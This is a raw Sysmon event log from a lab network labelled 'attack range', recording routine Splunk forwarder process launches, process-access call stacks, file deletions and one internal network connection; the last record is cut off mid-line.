11:18:49.790{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221764Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.790{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221763Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.790{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221762Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.790{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221761Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.790{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221760Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.790{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221759Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.790{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1819-6216-2205-000000003902}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221758Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.790{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1819-6216-2205-000000003902}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221757Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.791{4F8D34B0-1819-6216-2205-000000003902}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000221756Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:47.555{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51671-false10.0.1.12-8000- 10341000x8000000000000000221755Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.290{4F8D34B0-1819-6216-2105-000000003902}32762936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221754Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.118{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1819-6216-2105-000000003902}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221753Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221752Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221751Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221750Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221749Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221748Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221747Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221746Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221745Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221744Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.118{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1819-6216-2105-000000003902}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221743Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.118{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1819-6216-2105-000000003902}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221742Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:49.119{4F8D34B0-1819-6216-2105-000000003902}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:50.296{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41F2C7535621593B3CC81CBD04F75ABB,SHA256=2879DD4998A968DF65BE6AB4F1E178542F75666018DAB369F67B55DB740E3818,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221772Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:50.212{4F8D34B0-1819-6216-2205-000000003902}40483520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000221771Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:50.119{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17B31A171A1DF3D6F7B8F8EF316B4287,SHA256=2EBF3E7FA12A1F9ABC5C6B1AEE79F011BF524F56B3C19E158F8D4D2D792A3EF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221770Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:50.009{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F643BF7CC1FABBE48D58329E23C0EFDF,SHA256=700D2D576BCA1177808F3EDFBA28983CD752834D16CECF9E7D022DAE64CF6A4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:51.311{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD6F83EA4080964CF129584E12A7E68C,SHA256=D12E7A816C579A90D72B1AE91CAFD90C61EF333121E5C644607591068E04DCE8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221786Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:51.259{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-181B-6216-2305-000000003902}3956C:\Program 